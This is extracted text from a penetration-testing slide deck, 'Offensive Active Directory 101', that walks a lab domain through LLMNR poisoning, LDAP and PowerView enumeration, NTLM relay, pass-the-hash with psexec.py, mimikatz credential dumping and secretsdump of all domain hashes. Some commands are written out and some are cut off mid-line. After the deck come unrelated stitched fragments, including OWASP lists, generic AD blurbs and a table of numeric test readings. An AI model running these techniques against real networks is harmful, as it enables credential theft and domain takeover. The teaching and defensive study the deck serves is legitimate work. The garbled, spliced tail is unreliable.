Offensive Active Directory 101
Disclaimer
Michael RitterwhoamiMichael RitterAbout me:Daily work: Previously: Professional at Deloitte Coordination and management ofPenetrationtests 5 years pentestingexperience OSCP Certified Performance of penetration tests Infrastructure Web Rich-Client Currently researchingPurple Teaming topics Security assessments of ActiveDirectory environmentsService-Owner Pentestingtacticx GmbH@BigM1ke oNeLinkedInXING3
Agendapwny.corp - AttackBasics What is Active Directory? Attack Landscape Active Directory Kill ChainPhase 1 – Unauthorized User AD Enumeration without credentials Gaining initial AccessPhase 2 - Unprivileged User Taking advantage of LDAP Lateral movement techniques Basics NTLM RelayPhase 3 - Privileged User Looting the thingMitigations4
BasicsWhat is Active Directory and who uses it?
BasicsWhat is Active Directory? Microsofts answer to directory services Active directory is a hierarchical structure to store objects to:» Access and manage resources of an enterprise» Resources like: Users, Groups, Computers, Policies etc. 95% percent of Fortune 1000 companies use Active Directory Active Directory relies on different technologies in order to provide all features:» LDAP» DNS More information about the basics:» nners-part-1/6
BasicsObjects» AD contains lot of juicy information about resources of an organization» Following an overview about existing objects in AD:7
BasicsGlobal Catalog The global catalog provides a central repository of domain information The global catalog provides a resource for searching an Active Directory forest LDAP queries use the global catalog to search for information Domain-Users have read access to the global ry/how-global-catalog-servers-work(v ws.10).aspx8
Attack LandscapeActive Directory – Structure Go Hunting?@ciyinet9
BasicsActive Directory – Privileged Accounts AD environments can be way more complex than that. Think about all theservices it provides@ciyinet10
BasicsBroad landscape of attacks Great attack landscape@ciyinet@ciyinet11
Active directory kill chainBroad landscape of attacks Focus of this at-analytics/ata-threats12
Active directory kill chainBroad landscape of attacks Focus of this at-analytics/ata-threats13
Phase 1Unauthorized User aka „Getting creds“
Phase 1Starting PointDCNotebooksTerminal ServerWorkstationsAttackerExchange15
Phase 1 - Unauthorized UserEnumerate – Common Network traffic Check out what network protocols are running and analyse for potentialweaknesses16
Phase 1 - Unauthorized UserEnumerate DHCP DHCP info17
Phase 1 - Unauthorized UserEnumerate DNS DNS recon18
Phase 1 - Unauthorized UserEnumerate – Metadata from LDAP Get some information from the LDAP service This information is necessary for other devices that want to join the domain19
Phase 1 - Unauthorized UserEnumerate – Metadata from LDAP Forest functionality level is set based on the highest OS functionality level adomain can ds--functional-levels20
Phase 1 - Unauthorized UserResults – AD Recon Results:» Domain name pwny.lab» Domain Controller: pwnylabdc01.pwny.lab (10.0.3.200)» Subnetz: 10.0.3.0/24» Router: 10.0.3.1» DC functionality level: Windows Server 2012» Network clients:» workstation01.pwny.lab» workstation04.pwny.lab21
Phase 1 - Unauthorized UserGaining Access – Lots of opportunities to get initial access22
Phase 1 - Unauthorized UserGaining Access – Lots of opportunities to get initial access There are many different ways to steal user credentials like:» Rouge devices» Password spraying» Default passwords (Tomcat, Jenkins & Co)» Missing patches» Cleartext passwords on file share» Vulnerable web application» Kerberoasting» Social Engineering» Phishing» MITM» Vulnerable software versions» Have a look at the MITRE Attack Matrix» https://attack.mitre.org/wiki/Initial Access23
Phase 1 - Unauthorized UserGaining Access – DNS FallbackprotocolsLLMNR, NBNS & Co. DNS-Fallbackprotocols Link Local Multicast Name Resolution (LLMNR) NETBIOS Name Service (NBNS) mDNS LLMNR & NBNS allow name resolution offailed DNS requests Leveraging other computers in anetwork24
Network Layer Protection Analysis & AttackAblauf einer Namensauflösung Name Resolution Process:Lokale „hosts“ DateiDNS ServerFallback Protocols:LLMNR/NBNS/mDNS Usage of LLMNR & NBNS in the PWNY.corp network25
Network Layer Protection Analysis & AttackLLMNR/NBNS Poisoning Attack2. I don‘t know that one1. Connect to //filsrv3. Anyone know // filsrv?DNS ServerVictimNetwork-ClientsAttacker26
DemoStealing credentials abusing LLMNR/NBTNS
Phase 1 - Unauthorized UserGaining Access Analysing and cracking thehashes Cracking the hashes28
Phase 1 - Unauthorized UserResults Results:» Valid user account with password» PWNY\jar.jar-binks:Welcome2015» Users password hashes for:» PWNY\darth.vader» PWNY\obi-wan.kenobi» PWNY\chewbacca29
Phase 2 – Unprivileged UsersTaking advantage of LDAP
Phase 2 – Unprivileged userEscalating privileges aka. lateral movement During phase 1, it was possible to compromise an unprivileged user account» Not a local admin on any machine» Not a member of any sensitive group What can you do with this?» Login to webmail/user-mailbox» Ruler» Enumerate available SMB-shares» SMBMap» CrackMapExec» Use available information in the Global Catalog to your advantage31
Phase 2 – Unprivileged userTaking advantage of LDAP Use available information in the Global Catalog to your advantage LDAP is the underlying directory access protocol in AD There are no special privileges needed to bind to LDAP - any valid account canread the entire directory! (by default) Create very flexible queries using LDAP. Examples:» Get a list of all domain users that contain *adm* in their account name» Get a list of all domain groups that contain *adm*» Get a list of all domain joined systems where operating system like *XP* or *2000*» Show all groups a user is memberOf» Recursively lookup all members of a group» Show all user that have a description like *pass* or *pw*32
Phase 2 – Unprivileged userLateral movement - Taking advantage of LDAPGet a list of all domain usersldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "jar-jar.binks@pwny.lab" -w Welcome2015 -bdc pwny,dc lab "(objectClass user)" sAMAccountName userPrincipalName memberOfGet a list of all domain groupsldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "jar-jar.binks@pwny.lab" -w Welcome2015 -bdc pwny,dc lab "(objectClass group)" sAMAccountName member memberOfGet a list of all domain joined systemsldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "jar-jar.binks@pwny.lab" -w Welcome2015 -bdc pwny,dc lab "(objectClass computer)" name dNSHostname operatingSystem operatingSystemVersionlastLogonTimestamp servicePrincipalNameRecursively lookup all members of a groupldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "jar-jar.binks@pwny.lab" -w Welcome2015 -bdc pwny,dc lab "(&(objectClass user)(memberof:1.2.840.113556.1.4.1941: CN DomänenAdmins,CN Users,DC PWNY,DC LAB))" grep sAMAccountName cut -d" " -f2Show all groups a user is memberOfldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "jar-jar.binks@pwny.lab" -w Welcome2015 -bdc pwny,dc lab "(sAMAccountName darth.vader)" sAMAccountName userPrincipalName memberOf grepmemberOf cut -d " " -f2 cut -d"," ctiveDirectory.pdf33
Phase 2 – Unprivileged userLateral movement - Taking advantage of LDAP Another nice tool for manual analysis isActive Directory Explorer fromSysinternals» You can use AD Explorer to easilynavigate through the global catalog» Nice GUI to explore the environment» Define favorite locations» View object properties and attributeswithout having to open dialog boxes» Edit permissions» View an object's schema, and executesophisticated searches, that you cansave and re-execute.34
Phase 2 – Unprivileged userLateral movement - Taking advantage of LDAP35
Phase 2 – Unprivileged userLateral movement - Taking advantage of LDAP36
Phase 2 – Unprivileged userLateral movement - PowerView PowerView is a PowerShell tool to gain network situational awareness onWindows domains No administrative credentials required My personal favorite Very useful for both “Blue” and “Red” Teams It contains a load of useful functions to identify possible issues in ADenvironments» net * Functions» GPO functions» User-Hunting Functions» Domain Trust Functions» MetaFunctions More details can be found at:» e/master/Recon37
Phase 2 – Unprivileged userLateral movement - PowerView Run PowerView from a non-domain erView.ps1"))# Use an alterate creadential for any PowerView function SecPassword ConvertTo-SecureString 'Welcome2015' -AsPlainText -Force Cred New-Object r-jar.binks', SecPassword)# Check if everything worksGet-NetDomain -Credential Cred #test38
Phase 2 – Unprivileged userLateral movement - PowerView Enumerate all users, can be used for:» Phishing and other social engineering attacks» Password spraying» . be creative# Get all the usersGet-NetUser -Credential Cred Format-Table name, samaccountname, userprincipalname, description39
Phase 2 – Unprivileged userTaking advantage of LDAP All this information can be re-used for further attacks. For example:» Usernames» Password spraying» Phone numbers» Social engineering» Mail addresses» Phishing attacks40
Phase 2 – Unprivileged userLateral movement - PowerView Enumerate what groups a specific user is member of# List all groups of a specific userGet-DomainGroup -MemberIdentity darth.vader -Credential Cred Format-Table cn41
Phase 2 – Unprivileged userLateral movement - PowerView Enumerate existing groups# Get all existing groupsget-netgroup -Credential Cred Format-Table cn, distinguishedname, descriptionget-netgroup *adm* -Credential Cred Format-Table cn, distinguishedname, description42
Phase 2 – Unprivileged userLateral movement - PowerView Enumerate what groups a specific user is member of# List all members of a specific groupGet-NetGroupMember -Identity "Domänen-Admins" -Recurse -Credential Cred Format-Table groupname,memberdomain, membername43
Phase 2 – Unprivileged userLateral movement - PowerView Go for a hunt and check out users that have active sessions work computers# Go hunting for active user sessionsInvoke-UserHunter -showall -Credential cred -ComputerName workstation04 Format-Table -Propertyuserdomain, username,computername, ipaddress Remember that one?44
Phase 2 – Unprivileged userLateral movement - PowerView List members of local groups of any system that has joined the domain# List all members of a specific local groupGet-NetLocalGroupMember -ComputerName workstation04 -GroupName Administratoren –Credential Cred FormatTable membername,isgroup,isdomain Remember that one?45
Phase 2 – Unprivileged userLateral movement – PowerView – Key takeaways Key takeaway of the enumeration» obi-wan.kenobi is member of the adm workstations group» All members of the adm workstations group have administrative rights on theworkstation04.pwny.lab system» luke.skywalker who is member of “Domain Administrators” and has an active sessionon workstation04.pwny.labUser: luke.skywalkerGroup: adm workstationsServer: pwnylabdc01Computer: workstation04User: Domain AdministratorsUser: obi-wan.kenobi46
Phase 2 – Unprivileged userLateral movement - Bloodhound BloodHound enumerates the whole ADwith normal user privileges and exports itinto a graph. BloodHound requires the following sets ofinformation from an Active Directory:» Who is logged on where?» Who has admin rights where?» What users and groups belong to whatgroups? All this information can be extracted withnormal user privileges. This tool becomes very useful in morecomplex ound/wiki/Getting-started47
Phase 2 – Unprivileged userLateral movement - BloodhoundPerform the following steps to useBloodhound:1. Use “Bloodhoud PowerShell ingestor” tocollect the dataa. Possible without administrativeprivileges (in most cases)2. Setup neo4j and bloodhounda. hound/wiki3. Run bloodhound and import the i/Getting-started48
Phase 2 – Unprivileged userLateral movement - Bloodhound49
Phase 2 – Unprivileged userLateral movement - Bloodhound50
Phase 2 – Lateral MovementNTLM-Relay to move lateral within a network
NTLM RelayUsing ntlmrelayx.py What are the requirements for it towork?» SMB Signing has to be deactivated on Conclusion» Force the victim to authenticate theattackers (maybe your) machineour target» By default disabled on allworkstations and servers except ofDC s» Authentication needs to be done witha user that has administrativeprivileges on the target in order to getRCE Attacks to enforce authentication:» LLMNR/NBNS Poisoning» UNC Path Injection» Websites – XSS, HTML injection,Directory Traversal, SQL injection etc.» Office Documents etc.» MITM» Open -your-unc-path/52
NTLM RelayForcing authentication using LLMNR/NBNS Poisoning Attack2. I don‘t know that one1. Connect to //filsrv3. Anyone know // filsrv?DNS ServerVictimNetwork-ClientsAttacker53
NTLM RelayNETNTLMv1/v2 Authentication Processworking onUser: obi-wan.kenobi1. This is obi-wan.kenobi, I‘d like to Login4. Here is the challenge andresponse of obi-wan.kenobi isthat valid?2. If you are really obi-wan.kenobi,then encrypt this challenge with obiwan.kenobi‘s PW Hash5. I have compared obiwan.kenobis challege & responseand it is valid/invalid!3. Here is the encrypted challengefileserverworkstation01pwnylabdc016. Access Granted/Denied54
NTLM RelayAuthentication Process – NETNTLMv1/v2 - MaliciousUser: obi-wan.kenobiworking on1. This is obiwan.kenobi, I‘d like toLogin2. This is obi-wan.kenobi,I‘d like to Login3. Encrypt this challengewith obi-wan.kenobi‘sPW Hash4. Encrypt this challengewith obi-wan.kenobi‘sPW Hashworkstation015. Here is the encryptedchallengeAttacker6. Here is the encryptedchallenge7. Here is the challenge andresponse of obi-wan.kenobi isthat valid?workstation048. I have compared obiwan.kenobis challege &response and it is valid!pwnylabdc019. Access Granted!10. Access DENIED!Result:Remote CodeExecution55
NTLM RelayAuthentication Process – NETNTLMv1/v2 - Malicious Impacket» Awesome, collection of python scripts for working with network protocols» https://github.com/CoreSecurity/impacket What protocols are featured?» Ethernet, Linux "Cooked" capture.» IP, TCP, UDP, ICMP, IGMP, ARP. (IPv4 and IPv6)» NMB and SMB1/2/3 (high-level implementations).» DCE/RPC versions 4 and 5, over different transports: UDP (version 4 exclusively), TCP,SMB/TCP, SMB/NetBIOS and HTTP.» Portions of the following DCE/RPC interfaces: Conv, DCOM (WMI, OAUTH), EPM,SAMR, SCMR, RRP, SRVSC, LSAD, LSAT, WKST, NRPC56
DemoNTLM Relay
NTLM RelayResults of the attack We dropped the hashes of the localSAM database on workstation04 Can be used to Pass-the-Hash By default, Windows Vista and higherno longer store LM hashes on disk Benchmark on NTLM Hash withSagitta Brutalis 1080 (8x GF GTX 1080)» 330 GH/s on NTLM (Hashcat)LLMNR/NBNS PoisoningNTLM Relay perform using ntlmrelayx.py – By default it will perform a epixoip/a83d38f412b4737e99bbef804a270c4058
NTLM RelayUsing ntlmrelayx.py NTLM Relay» Relaying hashes is possible» ntlmrelayx.py also offers option torun arbitrary commands on thesystem» if the user is not admin you won tget RCE, however you can relay toother services like:» LDAP» IMAP» MSSQL» SMBRelaying to IMAP on Mailserver and dumping all mails that contain the search term passwordRelaying to LDAP server and creating a new user59
Pass-the-HashUsing psexec.py to Pass-the-Hash
Pass-the-hashUsing psexec.py to Pass-the-Hash and drop a shell Run psexec and Pass-the-Hash» 605ea71fca715caacfaa92088150:::# Pass-the-Hash with psexecpython psexec.py helpdesk@workstation03 –hashes caacfaa9208815061
Pass-the-HashResults of phase 2 Key takeaway after Pass-the-Hash to workstation04» We have local administrative rights on workstation04 and can executecode» The “Domain Admin” luke.skywalker is working on this computerUser: luke.skywalkerGroup: adm workstationsServer: pwnylabdc01Computer: workstation04User: Domain AdministratorsUser: obi-wan.kenobi62
Phase 3 – Privileged AccessKeep moving laterally abusing local admin privilges
Phase 3 – Privileged user (local)Lateral movement – Hunting down the Domain Administrators Administrative access to a computer means we can read processmemory» Dumping memory contents of lsass.exe & extracting credentials» Sysinternals ProcDump creates a minidump of the target process» Use Mimikatz to extract the credentials from it» Will not trigger AV» Use Mimikatz in Metasploit to dump the credentials» Might trigger dd996900.aspx
DemoDump creds with mimikatz
Phase 3 – Privileged user (local)Lateral movement – Hunting down the Domain Administrators Run psexec and Pass-the-Hash# Dumping creds in with meterpreter in metasploit using mimikatz (make sure you use an privileged account)getsystemload mimikatzmimikatz command –f privilege::debugmimikatz command –f om/en-us/sysinternals/dd996900.aspx
Phase 3 – Privileged user (local)Lateral movement – PowerView – Key takeaways Key takeaway of after dumping the creds» We have valid credentials for the user luke.skywalker» luke.skywalker is member of the “Domain Admin” group, so wehave administrative access to the domain controllerUser: luke.skywalkerGroup: adm workstationsServer: pwnylabdc01Computer: workstation04User: Domain AdministratorsUser: obi-wan.kenobi67
Phase 3 – Privileged UserLooting the thing
Phase 3 – Privileged user (domain)Looting the thing – secretsdump.py We have administrative access to the domain controller What now? Do you want persistance?» Dumping all user hashes» Creation of golden tickets69
Phase 3 – Privileged user (domain)Looting the thing – secretsdump.py On workstations:» secretsdump.py can be used to dump SAM/LSA secrets remotely» Performs various techniques to dump hashes from a remote machinewithout executing any agent there On DCs it will also:» For NTDS.dit it will either:a) Get the domain users list and get all hashes of all domain users(including historical ones) as well as Kerberos keysa) MS Directory Replication Service (MS-DRS) Remote Protocolb) Extract NTDS.dita) vssadmin executed with the smbexec approach70
DemoDumping all the hashes – secretsdump.py
Phase 3 – Privileged user (local)Lateral movement – Hunting down the Domain Administrators Run secretydump.py with administrative creds on the domain controller# Dumping hashes of all domain users (including password history hashes)python
What is Active Directory? Microsofts answer to directory services Active directory is a hierarchical structure to store objects to: » Access and manage resources of an enterprise » Resources like: Users, Groups, Computers, Policies etc. 95% percent of Fortune 1000 companies use Active Directory
OWASP Code review guide, V1.1 The Ruby on Rails Security Guide v2 OWASP UI Component Verification Project (a.k.a. OWASP JSP Testing Tool) Internationalization Guidelines and OWASP-Spanish Project OWASP Application Security Desk Reference (ASDR) OWASP .NET Project Leader OWASP Education Project
DNS is a requirement for Active Directory. Active Directory clients such as users computers) use DNS to find each other and locate services advertised in Active Directory by the Active Directory domain controllers. You must decide whether DNS will be integrated with Active Directory or not. It is easier to get Active Directory up and
An Active Directory forest is a collection of one or more Active Directory domains that share a common Active Directory schema . Most Active Directory environments exist with one Active Directory domain in its own Active Directory forest .
Active directory is a hierarchical structure to store objects to: » Access and manage resources of an enterprise » Resources like: Users, Groups, Computers, Policies etc. 95% percent of Fortune 1000 companies use Active Directory Active Directory relies on different technologies in order to provide all features: » LDAP » DNS
Active Directory Recovery Planning Chewy Chong Senior Consultant Systems Engineering Practice Avanade Australia SVR302 . Key Takeaways . Backup utility, DNS Manager, Active Directory Domains and Trusts Microsoft Management Console snap-in, Active Directory Installation Wizard, Active Directory Schema snap-in, Active Directory Sites and .
Module 4: Principles of Active Directory Integration This module explains how Active Directory can be integrated and used with other Active Directory Forests, X.500 Realms, LDAP services and Cloud services. Lessons Active Directory and The loud _ User Principle Names, Authentication and Active Directory Federated Services
work with clients, we also find that the OWASP Top 10 vulnerabilities are some of the most prevalent. This tells us that all companies should at least be looking for the OWASP Top 10 on a regular basis. A1 - Injection OWASP Top 10 -2013 OWASP Top 10 -2017 A2 - Broken Authentication and Session Managament A3 - Cross-Site Scripting (XSS)
P 4 418.668 P 4 419.989 P 5 418.186 P 5 419.227 P 6 418.973 P 6 419.684 P 7 419.379 P 7 420.751 P 8 420.141 P 8 420.065 P 9 419.532 P 9 421.259 P 10 418.643 P 10 421.386 P 11 418.719 P 11 418.846 P 12 416.763 P 12 419.887 P 13 414.782 P 13 418.363 P 14 P 14 P 15 P 15 P 16 P 16 P 17 P 17 P 18 P 18 P 19 P 19 Test Sample j 2 Test Sample j 3 Reading Points Reading Points Reading Points Test Sample .